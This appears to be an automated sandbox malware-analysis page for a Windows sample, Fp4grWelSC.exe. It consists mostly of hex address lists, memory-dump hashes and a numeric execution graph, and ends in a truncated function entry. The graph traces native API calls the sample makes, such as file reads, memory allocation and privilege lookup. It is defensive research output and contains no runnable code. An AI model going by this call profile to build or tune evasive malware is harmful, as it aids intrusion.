                                    0x0037234c
                                    0x0037234e
                                    0x00372350
                                    0x00372352
                                    0x00372354
                                    0x00372356
                                    0x00372358
                                    0x00000000
                                    0x00372358
                                    0x00372354
                                    0x0037237b
                                    0x0037237d
                                    0x00372380
                                    0x00372382
                                    0x00372384
                                    0x003723a9
                                    0x003723a9
                                    0x003723ac
                                    0x003723ad
                                    0x003723ae
                                    0x00372386
                                    0x00372386
                                    0x00372388
                                    0x0037238a
                                    0x0037238c
                                    0x00372390
                                    0x00372395
                                    0x00372397
                                    0x00372399
                                    0x0037239e
                                    0x003723a0
                                    0x003723a2
                                    0x003723a3
                                    0x003723a8
                                    0x00000000
                                    0x003723a8
                                    0x0037238a
                                    0x003723b0
                                    0x003723b5
                                    0x003723b6
                                    0x003723b9
                                    0x003723bd
                                    0x003723c4
                                    0x003723c5
                                    0x003723c8
                                    0x003723c9
                                    0x003723cb
                                    0x003723d0
                                    0x003723d2
                                    0x003723d4
                                    0x003723d6
                                    0x003723da
                                    0x003723e1
                                    0x003723e2
                                    0x003723e3
                                    0x003723e5
                                    0x003723e6
                                    0x003723e8
                                    0x003723ee
                                    0x003723f4
                                    0x003723f7
                                    0x003723f8
                                    0x003723f8
                                    0x003723f9
                                    0x003723fd
                                    0x003723ff
                                    0x00372401
                                    0x00372403
                                    0x00372405
                                    0x00372407
                                    0x00372409
                                    0x0037240b
                                    0x0037240d
                                    0x0037240f
                                    0x00372411
                                    0x00372413
                                    0x00372418
                                    0x0037241a
                                    0x0037241c
                                    0x0037241e
                                    0x00372422
                                    0x00372427
                                    0x0037242a
                                    0x0037242f
                                    0x00372430
                                    0x00372434
                                    0x00372435
                                    0x00372437
                                    0x00372439
                                    0x0037243b
                                    0x0037243d
                                    0x00372443
                                    0x00372445
                                    0x00372447
                                    0x00372449
                                    0x0037244b
                                    0x0037244d
                                    0x0037244e
                                    0x00372453
                                    0x00372456
                                    0x00372458
                                    0x00372458
                                    0x00372459
                                    0x00372459
                                    0x003721fd

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.687786905.0000000000372000.00000002.00020000.sdmp, Offset: 00370000, based on PE: true
                                    • Associated: 00000000.00000002.687776022.0000000000370000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.687988919.00000000003D8000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.688004733.00000000003DF000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_370000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57a40690b642d5cd76a3ffd68e6cb70f36bfb79bb71113e37ab91a16f00ac755
                                    • Instruction ID: 8f99c0c05a478b435c6f049e4325f0d707c3937e9877b5193adee2b32df778ed
                                    • Opcode Fuzzy Hash: 57a40690b642d5cd76a3ffd68e6cb70f36bfb79bb71113e37ab91a16f00ac755
                                    • Instruction Fuzzy Hash: F2E2F06140E3C24FCB278B785CB12D27FB1AE5721871E99C7C4C0CF0A7D519A96AE726
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D6EC50, Relevance: .3, Instructions: 315COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0dfde9ba13aaacccc2b1f1b1b07b03aee324b85b98a373062fb17561ea9af5b9
                                    • Instruction ID: 71a82a97eec5a16836403d60ccf01e045e870f2d75c82d3136672c1b9de28991
                                    • Opcode Fuzzy Hash: 0dfde9ba13aaacccc2b1f1b1b07b03aee324b85b98a373062fb17561ea9af5b9
                                    • Instruction Fuzzy Hash: 7912B4F5421F46CAD318DF65FCC86893BA1B745728B904308D261ABBF8D7B8254ACF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D6C884, Relevance: .3, Instructions: 265COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9d07baf4ba5c9bead4aa7f4be3c7a5c737100d3f587df65376e87cda76694069
                                    • Instruction ID: 3ec075f4d21f0cf3b2e0e32bbd8f19f18dd1abac411f65fa6a27f9f5c271af1e
                                    • Opcode Fuzzy Hash: 9d07baf4ba5c9bead4aa7f4be3c7a5c737100d3f587df65376e87cda76694069
                                    • Instruction Fuzzy Hash: 92A18136E1021A8FCF05DFA5C8445EDB7B2FF85301B19816AE805BB261EB75E945CF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D6EC40, Relevance: .2, Instructions: 221COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c7d21024f4ef515f11e1f9435ff7fb2a538f6bdb086903769173c5ff0cc349f3
                                    • Instruction ID: 29d024fdefffb9ca51d57681889d2ceef43ea1c67e17c78b8b04f07822c9daf4
                                    • Opcode Fuzzy Hash: c7d21024f4ef515f11e1f9435ff7fb2a538f6bdb086903769173c5ff0cc349f3
                                    • Instruction Fuzzy Hash: 3EC10AB5821B46CAD718DF65FCC82893BB1BB85328F514308D161ABBE8D7B4254ACF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: Fp4grWelSC.exe PID: 6436 Parent PID: 7132 Fp4grWelSC.exeCOMMON

                                    Execution Graph

                                    Execution Coverage:7.7%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.1%
                                    Total number of Nodes:682
                                    Total number of Limit Nodes:71

                                    Graph

                                    execution_graph 16715 41d400 16718 419bf0 16715->16718 16719 419c16 16718->16719 16730 408b60 16719->16730 16721 419c22 16722 419c69 16721->16722 16738 40d170 16721->16738 16724 419c37 16725 419c4c 16724->16725 16786 418930 16724->16786 16750 40a610 16725->16750 16728 419c5b 16729 418930 2 API calls 16728->16729 16729->16722 16789 408ab0 16730->16789 16732 408b6d 16733 408b74 16732->16733 16801 408a50 16732->16801 16733->16721 16739 40d19c 16738->16739 17301 40a010 16739->17301 16741 40d1ae 17305 40d080 16741->17305 16744 40d1e1 16746 40d1f2 16744->16746 16749 418710 2 API calls 16744->16749 16745 40d1c9 16747 40d1d4 16745->16747 16748 418710 2 API calls 16745->16748 16746->16724 16747->16724 16748->16747 16749->16746 16751 40a635 16750->16751 16752 40a010 LdrLoadDll 16751->16752 16753 40a68c 16752->16753 17321 409c90 16753->17321 16755 40a6b2 16785 40a903 16755->16785 17330 4133a0 16755->17330 16757 40a6f7 16757->16785 17333 4079d0 16757->17333 16759 40a73b 16759->16785 17340 418780 16759->17340 16763 40a791 16764 40a798 16763->16764 16765 418290 LdrLoadDll 16763->16765 16766 41a0a0 2 API calls 16764->16766 16767 40a7d5 16765->16767 16768 40a7a5 16766->16768 16769 40a7e2 16767->16769 16772 40a7f2 16767->16772 16768->16728 16770 41a0a0 2 API calls 16769->16770 16771 40a7e9 16770->16771 16771->16728 16773 40d200 LdrLoadDll 16772->16773 16774 40a866 16773->16774 16774->16764 16775 40a871 16774->16775 16776 41a0a0 2 API calls 16775->16776 16777 40a895 16776->16777 17350 4182e0 16777->17350 16780 418290 LdrLoadDll 16781 40a8d0 16780->16781 16781->16785 17353 4180a0 16781->17353 16784 418930 2 API calls 16784->16785 16785->16728 16787 41894f ExitProcess 16786->16787 16788 4191e0 LdrLoadDll 16786->16788 16788->16787 16790 408ac3 16789->16790 16841 416e50 16789->16841 16820 416d00 16790->16820 16793 408ad6 16793->16732 16794 408acc 16794->16793 16823 419530 16794->16823 16796 408b13 16796->16793 16834 4088d0 16796->16834 16798 408b33 16845 408320 16798->16845 16800 408b45 16800->16732 17282 419820 16801->17282 16804 419820 LdrLoadDll 16805 408a7b 16804->16805 16806 419820 LdrLoadDll 16805->16806 16807 408a91 16806->16807 16808 40cf70 16807->16808 16809 40cf89 16808->16809 17286 409e90 16809->17286 16811 40cf9c 17290 418460 16811->17290 16814 408b85 16814->16721 16816 40cfc2 16817 40cfed 16816->16817 17298 4184e0 16816->17298 16819 418710 2 API calls 16817->16819 16819->16814 16849 418880 16820->16849 16824 419549 16823->16824 16888 413a50 16824->16888 16826 419561 16827 41956a 16826->16827 16927 419370 16826->16927 16827->16796 16829 41957e 16829->16827 16945 418180 16829->16945 16835 4088da 16834->16835 17254 406e20 16835->17254 16837 4088f1 16837->16798 16838 4088e9 16838->16837 17267 4070e0 16838->17267 16842 416e5f 16841->16842 16843 413e50 LdrLoadDll 16842->16843 16844 416e9d 16843->16844 16844->16790 16846 408348 16845->16846 17274 409d60 16846->17274 16848 40837e 16848->16800 16852 4191e0 16849->16852 16851 416d15 16851->16794 16853 4191f0 16852->16853 16855 419212 16852->16855 16856 413e50 16853->16856 16855->16851 16857 413e5e 16856->16857 16858 413e6a 16856->16858 16857->16858 16861 4142d0 16857->16861 16858->16855 16866 413fd0 16861->16866 16863 4142e8 16864 413e50 LdrLoadDll 16863->16864 16865 413fbc 16863->16865 16864->16865 16865->16855 16867 413ff5 16866->16867 16868 414064 16867->16868 16880 409b40 16867->16880 16868->16863 16870 414096 16875 41413b 16870->16875 16884 41a340 16870->16884 16873 414134 16873->16875 16878 4142d0 LdrLoadDll 16873->16878 16874 4141a1 16874->16875 16876 4142d0 LdrLoadDll 16874->16876 16875->16863 16877 4141d3 16876->16877 16877->16863 16879 414197 16878->16879 16879->16863 16881 409b64 16880->16881 16882 409ba0 LdrLoadDll 16881->16882 16883 409b6b 16881->16883 16882->16883 16883->16870 16885 41a350 16884->16885 16887 4140dd 16884->16887 16886 413e50 LdrLoadDll 16885->16886 16886->16887 16887->16873 16887->16874 16887->16875 16889 413d85 16888->16889 16891 413a64 16888->16891 16889->16826 16891->16889 16951 417ed0 16891->16951 16893 413b90 16954 4185e0 16893->16954 16894 413b73 17011 4186e0 16894->17011 16897 413b7d 16897->16826 16898 413bb7 16899 41a0a0 2 API calls 16898->16899 16901 413bc3 16899->16901 16900 413d49 16903 418710 2 API calls 16900->16903 16901->16897 16901->16900 16902 413d5f 16901->16902 16908 413c52 16901->16908 17036 413790 16902->17036 16904 413d50 16903->16904 16904->16826 16906 413d72 16906->16826 16907 413cb9 16907->16900 16910 413ccc 16907->16910 16908->16907 16909 413c61 16908->16909 16911 413c66 16909->16911 16912 413c7a 16909->16912 17027 418560 16910->17027 17014 413650 16911->17014 16916 413c97 16912->16916 16917 413c7f 16912->16917 16916->16904 16969 413410 16916->16969 16957 4136f0 16917->16957 16919 413c70 16919->16826 16922 413c8d 16922->16826 16925 413caf 16925->16826 16926 413d38 16926->16826 16929 419381 16927->16929 16928 419393 16928->16829 16929->16928 17101 41a020 16929->17101 16931 4193b4 17104 413060 16931->17104 16933 419400 16933->16829 16934 4193d7 16934->16933 16935 413060 3 API calls 16934->16935 16938 4193f9 16935->16938 16937 41948a 16939 41949a 16937->16939 17221 419180 16937->17221 16938->16933 17129 414390 16938->17129 17139 418ff0 16939->17139 16942 4194c8 17218 418140 16942->17218 16946 4191e0 LdrLoadDll 16945->16946 16947 41819c 16946->16947 16948 41a0a0 16947->16948 16949 4195d9 16948->16949 17251 4188f0 16948->17251 16949->16796 16952 4191e0 LdrLoadDll 16951->16952 16953 413b44 16951->16953 16952->16953 16953->16893 16953->16894 16953->16897 16955 4191e0 LdrLoadDll 16954->16955 16956 4185fc NtCreateFile 16955->16956 16956->16898 16958 41370c 16957->16958 16959 418560 LdrLoadDll 16958->16959 16960 41372d 16959->16960 16961 413734 16960->16961 16962 413748 16960->16962 16964 418710 2 API calls 16961->16964 16963 418710 2 API calls 16962->16963 16966 413751 16963->16966 16965 41373d 16964->16965 16965->16922 17070 41a2b0 16966->17070 16968 41375c 16968->16922 16970 41345b 16969->16970 16971 41348e 16969->16971 16972 418560 LdrLoadDll 16970->16972 16973 4135d9 16971->16973 16977 4134aa 16971->16977 16974 413476 16972->16974 16975 418560 LdrLoadDll 16973->16975 16976 418710 2 API calls 16974->16976 16983 4135f4 16975->16983 16978 41347f 16976->16978 16979 418560 LdrLoadDll 16977->16979 16978->16925 16980 4134c5 16979->16980 16981 4134e1 16980->16981 16982 4134cc 16980->16982 16987 4134e6 16981->16987 16991 4134fc 16981->16991 16986 418710 2 API calls 16982->16986 16984 4185a0 LdrLoadDll 16983->16984 16985 41362e 16984->16985 16988 418710 2 API calls 16985->16988 16989 4134d5 16986->16989 16990 418710 2 API calls 16987->16990 16992 413639 16988->16992 16989->16925 16993 4134ef 16990->16993 16994 413501 16991->16994 17077 41a270 16991->17077 16992->16925 16993->16925 16998 413513 16994->16998 17081 418690 16994->17081 16997 413567 16999 41357e 16997->16999 17089 418520 16997->17089 16998->16925 17001 413585 16999->17001 17002 41359a 16999->17002 17003 418710 2 API calls 17001->17003 17004 418710 2 API calls 17002->17004 17003->16998 17005 4135a3 17004->17005 17006 4135cf 17005->17006 17084 419e70 17005->17084 17006->16925 17008 4135ba 17009 41a0a0 2 API calls 17008->17009 17010 4135c3 17009->17010 17010->16925 17012 4191e0 LdrLoadDll 17011->17012 17013 4186fc 17012->17013 17013->16897 17015 41368d 17014->17015 17092 418240 17014->17092 17017 413694 17015->17017 17018 4136a8 17015->17018 17020 418710 2 API calls 17017->17020 17095 418290 17018->17095 17022 41369d 17020->17022 17022->16919 17023 418710 2 API calls 17024 4136d2 17023->17024 17025 418710 2 API calls 17024->17025 17026 4136dc 17025->17026 17026->16919 17028 413d14 17027->17028 17029 4191e0 LdrLoadDll 17027->17029 17030 4185a0 17028->17030 17029->17028 17031 413d2c 17030->17031 17032 4191e0 LdrLoadDll 17030->17032 17033 418710 17031->17033 17032->17031 17034 41872c NtClose 17033->17034 17035 4191e0 LdrLoadDll 17033->17035 17034->16926 17035->17034 17037 418560 LdrLoadDll 17036->17037 17038 4137ce 17037->17038 17039 4137d7 17038->17039 17040 4137ec 17038->17040 17041 418710 2 API calls 17039->17041 17042 413810 17040->17042 17043 41385a 17040->17043 17053 4137e0 17041->17053 17098 418640 17042->17098 17044 4138a0 17043->17044 17045 41385f 17043->17045 17049 4138b2 17044->17049 17055 4139da 17044->17055 17048 418690 2 API calls 17045->17048 17045->17053 17051 41388a 17048->17051 17052 4138b7 17049->17052 17063 4138f2 17049->17063 17050 418710 2 API calls 17050->17053 17054 418710 2 API calls 17051->17054 17056 418640 LdrLoadDll 17052->17056 17053->16906 17057 413893 17054->17057 17055->17053 17059 418690 2 API calls 17055->17059 17058 4138da 17056->17058 17057->16906 17060 418710 2 API calls 17058->17060 17062 413a31 17059->17062 17064 4138e3 17060->17064 17061 418640 LdrLoadDll 17065 41391a 17061->17065 17066 418710 2 API calls 17062->17066 17063->17053 17063->17061 17064->16906 17067 418710 2 API calls 17065->17067 17068 413a3a 17066->17068 17069 413925 17067->17069 17068->16906 17069->16906 17072 41a2ca 17070->17072 17073 4188b0 17070->17073 17072->16968 17074 4188cc RtlAllocateHeap 17073->17074 17075 4191e0 LdrLoadDll 17073->17075 17074->17072 17075->17074 17078 41a27f 17077->17078 17079 4188b0 2 API calls 17078->17079 17080 41a288 17079->17080 17080->16994 17082 4186ac NtReadFile 17081->17082 17083 4191e0 LdrLoadDll 17081->17083 17082->16997 17083->17082 17085 419e94 17084->17085 17086 419e7d 17084->17086 17085->17008 17086->17085 17087 41a270 2 API calls 17086->17087 17088 419eab 17087->17088 17088->17008 17090 4191e0 LdrLoadDll 17089->17090 17091 41853c 17090->17091 17091->16999 17093 4191e0 LdrLoadDll 17092->17093 17094 41825c 17093->17094 17094->17015 17096 4191e0 LdrLoadDll 17095->17096 17097 4136c9 17096->17097 17097->17023 17099 4191e0 LdrLoadDll 17098->17099 17100 413835 17099->17100 17100->17050 17225 4187c0 17101->17225 17103 41a04d 17103->16931 17105 413071 17104->17105 17107 413079 17104->17107 17105->16934 17106 41334c 17106->16934 17107->17106 17228 41b250 17107->17228 17109 4130cd 17110 41b250 2 API calls 17109->17110 17113 4130d8 17110->17113 17111 413126 17114 41b250 2 API calls 17111->17114 17113->17111 17233 41b2f0 17113->17233 17116 41313a 17114->17116 17115 41b250 2 API calls 17118 4131ad 17115->17118 17116->17115 17117 41b250 2 API calls 17126 4131f5 17117->17126 17118->17117 17121 41b2b0 2 API calls 17122 41332e 17121->17122 17123 41b2b0 2 API calls 17122->17123 17124 413338 17123->17124 17125 41b2b0 2 API calls 17124->17125 17127 413342 17125->17127 17239 41b2b0 17126->17239 17128 41b2b0 2 API calls 17127->17128 17128->17106 17130 4143a1 17129->17130 17131 413a50 6 API calls 17130->17131 17133 4143b7 17131->17133 17132 41440a 17132->16937 17133->17132 17134 4143f2 17133->17134 17135 414405 17133->17135 17136 41a0a0 2 API calls 17134->17136 17137 41a0a0 2 API calls 17135->17137 17138 4143f7 17136->17138 17137->17132 17138->16937 17140 419004 17139->17140 17141 418eb0 LdrLoadDll 17139->17141 17242 418eb0 17140->17242 17141->17140 17144 418eb0 LdrLoadDll 17145 419016 17144->17145 17146 418eb0 LdrLoadDll 17145->17146 17147 41901f 17146->17147 17148 418eb0 LdrLoadDll 17147->17148 17149 419028 17148->17149 17150 418eb0 LdrLoadDll 17149->17150 17151 419031 17150->17151 17152 418eb0 LdrLoadDll 17151->17152 17153 41903d 17152->17153 17154 418eb0 LdrLoadDll 17153->17154 17155 419046 17154->17155 17156 418eb0 LdrLoadDll 17155->17156 17157 41904f 17156->17157 17158 418eb0 LdrLoadDll 17157->17158 17159 419058 17158->17159 17160 418eb0 LdrLoadDll 17159->17160 17161 419061 17160->17161 17162 418eb0 LdrLoadDll 17161->17162 17163 41906a 17162->17163 17164 418eb0 LdrLoadDll 17163->17164 17165 419076 17164->17165 17166 418eb0 LdrLoadDll 17165->17166 17167 41907f 17166->17167 17168 418eb0 LdrLoadDll 17167->17168 17169 419088 17168->17169 17170 418eb0 LdrLoadDll 17169->17170 17171 419091 17170->17171 17172 418eb0 LdrLoadDll 17171->17172 17173 41909a 17172->17173 17174 418eb0 LdrLoadDll 17173->17174 17175 4190a3 17174->17175 17176 418eb0 LdrLoadDll 17175->17176 17177 4190af 17176->17177 17178 418eb0 LdrLoadDll 17177->17178 17179 4190b8 17178->17179 17180 418eb0 LdrLoadDll 17179->17180 17181 4190c1 17180->17181 17182 418eb0 LdrLoadDll 17181->17182 17183 4190ca 17182->17183 17184 418eb0 LdrLoadDll 17183->17184 17185 4190d3 17184->17185 17186 418eb0 LdrLoadDll 17185->17186 17187 4190dc 17186->17187 17188 418eb0 LdrLoadDll 17187->17188 17189 4190e8 17188->17189 17190 418eb0 LdrLoadDll 17189->17190 17191 4190f1 17190->17191 17192 418eb0 LdrLoadDll 17191->17192 17193 4190fa 17192->17193 17194 418eb0 LdrLoadDll 17193->17194 17195 419103 17194->17195 17196 418eb0 LdrLoadDll 17195->17196 17197 41910c 17196->17197 17198 418eb0 LdrLoadDll 17197->17198 17199 419115 17198->17199 17200 418eb0 LdrLoadDll 17199->17200 17201 419121 17200->17201 17202 418eb0 LdrLoadDll 17201->17202 17203 41912a 17202->17203 17204 418eb0 LdrLoadDll 17203->17204 17205 419133 17204->17205 17206 418eb0 LdrLoadDll 17205->17206 17207 41913c 17206->17207 17208 418eb0 LdrLoadDll 17207->17208 17209 419145 17208->17209 17210 418eb0 LdrLoadDll 17209->17210 17211 41914e 17210->17211 17212 418eb0 LdrLoadDll 17211->17212 17213 41915a 17212->17213 17214 418eb0 LdrLoadDll 17213->17214 17215 419163 17214->17215 17216 418eb0 LdrLoadDll 17215->17216 17217 41916c 17216->17217 17217->16942 17219 4191e0 LdrLoadDll 17218->17219 17220 41815c 17219->17220 17220->16829 17222 419193 17221->17222 17248 418740 17222->17248 17226 4191e0 LdrLoadDll 17225->17226 17227 4187dc NtAllocateVirtualMemory 17226->17227 17227->17103 17229 41b260 17228->17229 17230 41b266 17228->17230 17229->17109 17231 41a270 2 API calls 17230->17231 17232 41b28c 17231->17232 17232->17109 17234 41b315 17233->17234 17236 41b34d 17233->17236 17235 41a270 2 API calls 17234->17235 17237 41b32a 17235->17237 17236->17113 17238 41a0a0 2 API calls 17237->17238 17238->17236 17240 41a0a0 2 API calls 17239->17240 17241 413324 17240->17241 17241->17121 17243 418ecb 17242->17243 17244 413e50 LdrLoadDll 17243->17244 17245 418eeb 17244->17245 17246 413e50 LdrLoadDll 17245->17246 17247 418f97 17245->17247 17246->17247 17247->17144 17249 4191e0 LdrLoadDll 17248->17249 17250 41875c 17249->17250 17250->16939 17252 41890c RtlFreeHeap 17251->17252 17253 4191e0 LdrLoadDll 17251->17253 17252->16949 17253->17252 17255 406e30 17254->17255 17256 406e2b 17254->17256 17257 41a020 2 API calls 17255->17257 17256->16838 17263 406e55 17257->17263 17258 406eb8 17258->16838 17259 418140 LdrLoadDll 17259->17263 17260 406ebe 17262 406ee4 17260->17262 17264 418840 LdrLoadDll 17260->17264 17262->16838 17263->17258 17263->17259 17263->17260 17265 41a020 2 API calls 17263->17265 17271 418840 17263->17271 17266 406ed5 17264->17266 17265->17263 17266->16838 17268 4070f8 17267->17268 17269 418840 LdrLoadDll 17268->17269 17270 4070fe 17269->17270 17270->16798 17272 4191e0 LdrLoadDll 17271->17272 17273 41885c 17272->17273 17273->17263 17275 409d84 17274->17275 17278 417f10 17275->17278 17277 409dbe 17277->16848 17279 417f26 17278->17279 17280 4191e0 LdrLoadDll 17279->17280 17281 417f2c 17280->17281 17281->17277 17283 419843 17282->17283 17284 409b40 LdrLoadDll 17283->17284 17285 408a6a 17284->17285 17285->16804 17287 409eb3 17286->17287 17288 417f10 LdrLoadDll 17287->17288 17289 409f30 17287->17289 17288->17289 17289->16811 17291 418461 17290->17291 17292 4191e0 LdrLoadDll 17291->17292 17293 40cfab 17292->17293 17293->16814 17294 418a50 17293->17294 17295 418a53 17294->17295 17296 4191e0 LdrLoadDll 17295->17296 17297 418a6f LookupPrivilegeValueW 17296->17297 17297->16816 17299 4191e0 LdrLoadDll 17298->17299 17300 4184fc 17299->17300 17300->16817 17302 40a037 17301->17302 17303 409e90 LdrLoadDll 17302->17303 17304 40a066 17303->17304 17304->16741 17306 40d09a 17305->17306 17314 40d150 17305->17314 17307 409e90 LdrLoadDll 17306->17307 17308 40d0bc 17307->17308 17315 4181c0 17308->17315 17310 40d0fe 17318 418200 17310->17318 17313 418710 2 API calls 17313->17314 17314->16744 17314->16745 17316 4191e0 LdrLoadDll 17315->17316 17317 4181dc 17316->17317 17317->17310 17319 4191e0 LdrLoadDll 17318->17319 17320 40d144 17319->17320 17320->17313 17322 409ca1 17321->17322 17323 409c9d 17321->17323 17324 409cba 17322->17324 17325 409cec 17322->17325 17323->16755 17356 417f50 17324->17356 17326 417f50 LdrLoadDll 17325->17326 17327 409cfd 17326->17327 17327->16755 17331 40d200 LdrLoadDll 17330->17331 17332 4133c6 17330->17332 17331->17332 17332->16757 17334 4079e9 17333->17334 17360 407710 17333->17360 17336 407a0d 17334->17336 17337 407710 8 API calls 17334->17337 17336->16759 17338 4079fa 17337->17338 17338->17336 17378 40d470 17338->17378 17341 4191e0 LdrLoadDll 17340->17341 17342 40a772 17341->17342 17343 40d200 17342->17343 17344 40d21d 17343->17344 17345 418240 LdrLoadDll 17344->17345 17347 40d25e 17345->17347 17346 40d265 17346->16763 17347->17346 17348 418290 LdrLoadDll 17347->17348 17349 40d28e 17348->17349 17349->16763 17351 4191e0 LdrLoadDll 17350->17351 17352 40a8a9 17351->17352 17352->16780 17354 4191e0 LdrLoadDll 17353->17354 17355 40a8fc 17354->17355 17355->16784 17357 417f5b 17356->17357 17358 4191e0 LdrLoadDll 17357->17358 17359 409cdc 17358->17359 17359->16755 17361 406e20 2 API calls 17360->17361 17376 40772a 17361->17376 17362 4079b9 17362->17334 17363 4079af 17364 4070e0 LdrLoadDll 17363->17364 17364->17362 17367 418180 LdrLoadDll 17367->17376 17369 418710 LdrLoadDll NtClose 17369->17376 17372 40a910 LdrLoadDll NtClose 17372->17376 17375 4180a0 LdrLoadDll 17375->17376 17376->17362 17376->17363 17376->17367 17376->17369 17376->17372 17376->17375 17386 417f90 17376->17386 17389 407540 17376->17389 17401 40d350 17376->17401 17409 418010 17376->17409 17412 418040 17376->17412 17415 4180d0 17376->17415 17418 407310 17376->17418 17434 405ea0 17376->17434 17379 40d495 17378->17379 17380 407120 6 API calls 17379->17380 17381 40d4b9 17380->17381 17382 413a50 6 API calls 17381->17382 17383 40d4c6 17381->17383 17385 41a0a0 2 API calls 17381->17385 17522 40d2b0 17381->17522 17382->17381 17383->17336 17385->17381 17387 417fac 17386->17387 17388 4191e0 LdrLoadDll 17386->17388 17387->17376 17388->17387 17390 407556 17389->17390 17444 417b00 17390->17444 17392 4076e1 17392->17376 17393 40756f 17393->17392 17465 407120 17393->17465 17395 407655 17395->17392 17396 407310 7 API calls 17395->17396 17397 407683 17396->17397 17397->17392 17398 418180 LdrLoadDll 17397->17398 17399 4076b8 17398->17399 17399->17392 17400 418780 LdrLoadDll 17399->17400 17400->17392 17501 417fd0 17401->17501 17404 40d3b5 17404->17376 17407 40d3c1 17407->17376 17408 418710 2 API calls 17408->17404 17410 4191e0 LdrLoadDll 17409->17410 17411 41802c 17410->17411 17411->17376 17413 4191e0 LdrLoadDll 17412->17413 17414 41805c 17413->17414 17414->17376 17416 4191e0 LdrLoadDll 17415->17416 17417 4180ec 17416->17417 17417->17376 17419 407339 17418->17419 17507 407280 17419->17507 17422 418780 LdrLoadDll 17423 40734c 17422->17423 17423->17422 17424 4073d7 17423->17424 17427 4073d2 17423->17427 17515 40d3d0 17423->17515 17424->17376 17425 418710 2 API calls 17426 40740a 17425->17426 17426->17424 17428 417f90 LdrLoadDll 17426->17428 17427->17425 17429 40746f 17428->17429 17429->17424 17430 417fd0 LdrLoadDll 17429->17430 17431 4074d3 17430->17431 17431->17424 17432 413a50 6 API calls 17431->17432 17433 407528 17432->17433 17433->17376 17435 405eea 17434->17435 17436 417f90 LdrLoadDll 17435->17436 17437 405f04 17436->17437 17438 413e50 LdrLoadDll 17437->17438 17443 405fdc 17437->17443 17439 405f58 17438->17439 17440 409d60 LdrLoadDll 17439->17440 17441 405fb7 17440->17441 17442 413e50 LdrLoadDll 17441->17442 17442->17443 17443->17376 17445 41a270 2 API calls 17444->17445 17446 417b17 17445->17446 17472 408160 17446->17472 17448 417b32 17449 417b70 17448->17449 17450 417b59 17448->17450 17453 41a020 2 API calls 17449->17453 17451 41a0a0 2 API calls 17450->17451 17452 417b66 17451->17452 17452->17393 17454 417baa 17453->17454 17455 41a020 2 API calls 17454->17455 17456 417bc3 17455->17456 17462 417e64 17456->17462 17478 41a060 17456->17478 17459 417e50 17460 41a0a0 2 API calls 17459->17460 17461 417e5a 17460->17461 17461->17393 17463 41a0a0 2 API calls 17462->17463 17464 417eb9 17463->17464 17464->17393 17466 40721f 17465->17466 17467 407135 17465->17467 17466->17395 17467->17466 17468 413a50 6 API calls 17467->17468 17469 4071a2 17468->17469 17470 41a0a0 2 API calls 17469->17470 17471 4071c9 17469->17471 17470->17471 17471->17395 17473 408185 17472->17473 17474 409b40 LdrLoadDll 17473->17474 17475 4081b8 17474->17475 17477 4081dd 17475->17477 17481 40b340 17475->17481 17477->17448 17498 418800 17478->17498 17482 40b36c 17481->17482 17483 418460 LdrLoadDll 17482->17483 17484 40b385 17483->17484 17485 40b38c 17484->17485 17492 4184a0 17484->17492 17485->17477 17489 40b3c7 17490 418710 2 API calls 17489->17490 17491 40b3ea 17490->17491 17491->17477 17493 4191e0 LdrLoadDll 17492->17493 17494 40b3af 17493->17494 17494->17485 17495 418a90 17494->17495 17496 418aaf 17495->17496 17497 4191e0 LdrLoadDll 17495->17497 17496->17489 17497->17496 17499 4191e0 LdrLoadDll 17498->17499 17500 417e49 17499->17500 17500->17459 17500->17462 17502 40d394 17501->17502 17503 4191e0 LdrLoadDll 17501->17503 17502->17404 17504 418070 17502->17504 17503->17502 17505 4191e0 LdrLoadDll 17504->17505 17506 40d3a5 17505->17506 17506->17407 17506->17408 17508 407298 17507->17508 17509 409b40 LdrLoadDll 17508->17509 17510 4072b3 17509->17510 17511 413e50 LdrLoadDll 17510->17511 17512 4072c3 17511->17512 17513 4072cc PostThreadMessageW 17512->17513 17514 4072e0 17512->17514 17513->17514 17514->17423 17516 40d3e3 17515->17516 17519 418110 17516->17519 17520 4191e0 LdrLoadDll 17519->17520 17521 40d40e 17520->17521 17521->17423 17523 40d2c1 17522->17523 17531 418960 17523->17531 17525 40d308 17525->17381 17527 418180 LdrLoadDll 17528 40d31f 17527->17528 17528->17525 17529 418780 LdrLoadDll 17528->17529 17530 40d33e 17529->17530 17530->17381 17532 4191e0 LdrLoadDll 17531->17532 17533 40d301 17532->17533 17533->17525 17533->17527

                                    Executed Functions

                                    Function 0041868A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39filenativeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 41868a-4186d9 call 4191e0 NtReadFile
                                    C-Code - Quality: 25%
